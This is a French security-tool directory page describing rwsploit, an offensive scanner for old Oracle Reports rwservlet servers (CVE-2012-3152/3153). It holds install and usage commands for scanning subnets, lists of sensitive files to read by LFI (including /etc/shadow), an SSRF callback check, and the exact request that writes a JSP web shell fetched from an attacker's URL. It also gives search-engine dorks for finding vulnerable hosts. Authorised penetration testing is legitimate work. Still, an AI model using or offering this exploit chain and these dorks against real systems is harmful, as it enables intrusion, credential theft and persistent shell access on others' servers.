Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
rwsploit — Scanner d'exploitation automatisé pour Oracle Reports Server (rwservlet) — CVE-2012-3152 / CVE-2012-3153. Détecte, effectue le fingerprinting, lit des fichiers via LFI, teste la SSRF via webhook et téléverse des shells JSP. Cible Oracle Reports < 11g. Usage autorisé uniquement. | Kitploit
Outils/GitHubGitHub/abq0/rwsploit
ReconnaissanceScanners de VulnérabilitésGénération de PayloadsExploitationShellcodeExploitation d'Applications WebCollecte d'InformationsTests d'IntrusionRed Teaming
GitHubabq0/rwsploit

rwsploit

Scanner d'exploitation automatisé pour Oracle Reports Server (rwservlet) — CVE-2012-3152 / CVE-2012-3153. Détecte, effectue le fingerprinting, lit des fichiers via LFI, teste la SSRF via webhook et téléverse des shells JSP. Cible Oracle Reports < 11g. Usage autorisé uniquement.

6il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
Partager

Scanneur Oracle Reports rwservlet

⚠️ Réservé à un usage autorisé. N'exécutez cet outil que contre des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation écrite explicite. Toute utilisation non autorisée est illégale.

Un scanner d'exploitation ciblé pour Oracle Reports Server (rwservlet) ciblant CVE-2012-3152 et CVE-2012-3153 — affectant les versions antérieures à 11g. Automatise la détection, la lecture de fichiers LFI, les tests SSRF et le téléversement de shell JSP sur des IP uniques, des plages CIDR ou des listes de cibles. Un pré-filtrage TCP/HTTP intelligent ignore instantanément les hôtes morts afin de ne pas perdre de temps.


Installation

root@kitploit:~
git clone https://github.com/abq0/rwsploit.git
cd rwsploit
pip install requests

Python 3.8+ requis. Aucune autre dépendance.


Utilisation

root@kitploit:~
python3 rwsploit.py -t <IP|CIDR> [options]
python3 rwsploit.py -f <file>   [options]

Exécutez sans arguments pour voir le menu d'aide complet et les dorks de reconnaissance.


Options


Exemples

root@kitploit:~
# Detect only
python3 rwsploit.py -t 10.10.10.55 -p 7777

# Detect + LFI
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi

# Full chain — LFI + SSRF + shell
python3 rwsploit.py -t 10.10.10.55 -p 7777 --lfi --shell

# Subnet scan, save dumps
python3 rwsploit.py -t 10.10.10.0/24 -p 7777 --lfi -o loot

# From file, no SSRF
python3 rwsploit.py -f targets.txt --lfi --no-ssrf

Format de targets.txt

root@kitploit:~
# comment — skipped
10.10.10.55
10.10.11.0/24

Fonctionnalités

LFI

Lit les fichiers lisibles par tous (world-readable) en détectant d'abord l'OS via showenv, puis en exécutant uniquement l'ensemble de payloads correspondant.

Linux — /etc/passwd, /etc/shadow, /etc/hosts, /etc/issue, /etc/os-release, /etc/group, /etc/crontab, /etc/timezone, /proc/version, /proc/cmdline, /proc/self/environ

Windows — win.ini, system32\drivers\etc\hosts, boot.ini, system.ini, AUTOEXEC.BAT

🚨 L'absence de résultat LFI ne signifie pas que la cible est sûre — la configuration et les permissions de fichiers d'Oracle varient. Testez toujours le SSRF et le téléversement de shell indépendamment.

SSRF

Déclenche rwservlet?JOBTYPE=rwurl&URLPARAMETER=<webhook> et interroge l'API de webhook.site en attendant un rappel. Affiche l'IP source, la méthode et le User-Agent en cas de hit. Un nouveau jeton webhook est créé automatiquement au démarrage.

Téléversement de shell (--shell)

  1. Demande l'URL qui sert votre contenu de shell JSP
  2. Lit PATH_TRANSLATED depuis showenv pour obtenir le chemin réel du webroot
  3. Génère un nom de shell aléatoire (ex. kxqbrmfa.jsp)
  4. L'écrit via : rwservlet?report=xyzzy&destype=file&desname=<webroot\shell.jsp>&JOBTYPE=rwurl&URLPARAMETER=<your URL>
  5. Vérifie en testant l'URL du shell pour un HTTP 200 et affiche le lien actif

Dorks de reconnaissance — Oracle Reports < v11

Google

root@kitploit:~
inurl:"/reports/rwservlet" -site:oracle.com
inurl:"/reports/rwservlet/showenv"
inurl:"/reports/rwservlet/getserverinfo"
intitle:"Oracle Reports Server - Authenticate" inurl:rwservlet

Shodan

root@kitploit:~
http.html:"rwservlet"
http.html:"/reports/rwservlet" http.html:"Oracle"
http.html:"rwservlet/showenv"
http.html:"getserverinfo" http.html:"Oracle Reports"

FOFA

root@kitploit:~
body="/reports/rwservlet"
body="rwservlet" && body="Oracle Reports"
body="/reports/rwservlet/showenv"
body="getserverinfo" && body="rwservlet"

Censys

root@kitploit:~
services.http.response.body: "/reports/rwservlet"
services.http.response.body: "rwservlet" and services.http.response.body: "Oracle Reports"
services.http.response.body: "rwservlet/showenv"
services.http.response.html_title: "Oracle Reports"

CVE

CVEDescription
CVE-2012-3152Lecture de fichiers non authentifiée via le paramètre report de rwservlet
CVE-2012-3153SSRF et écriture de fichiers via JOBTYPE=rwurl + URLPARAMETER

Concerne Oracle Reports Server 6i, 9i, 10g — corrigé en 11g.


Légal

Réservé aux tests d'intrusion autorisés, aux challenges CTF et à la recherche en sécurité uniquement. L'auteur décline toute responsabilité en cas de mauvaise utilisation.

Télécharger l’outil
OptionDescriptionDéfaut
-tIP, nom d'hôte ou CIDR cible. Plusieurs valeurs acceptées.—
-fFichier avec une IP ou un CIDR par ligne. # = commentaire.—
-pPort personnalisé unique — remplace la liste de ports par défaut.80 443 8080 7777 7778 7779 8443 9090
-TThreads concurrents.15
-oEnregistre les dumps LFI sur le disque avec ce préfixe. ex. -o loot → loot_<ip>_<port>_<file>.txtstdout uniquement
--timeoutDélai d'expiration des requêtes en secondes.10
--lfiExécute les payloads de lecture de fichiers LFI. L'OS est détecté d'abord afin que seuls les payloads pertinents soient exécutés.désactivé
--no-ssrfIgnore le test webhook SSRF.désactivé
--shellTéléverse un shell JSP. Demande l'URL qui sert votre contenu de shell.désactivé
-hAffiche l'aide et les dorks de reconnaissance.—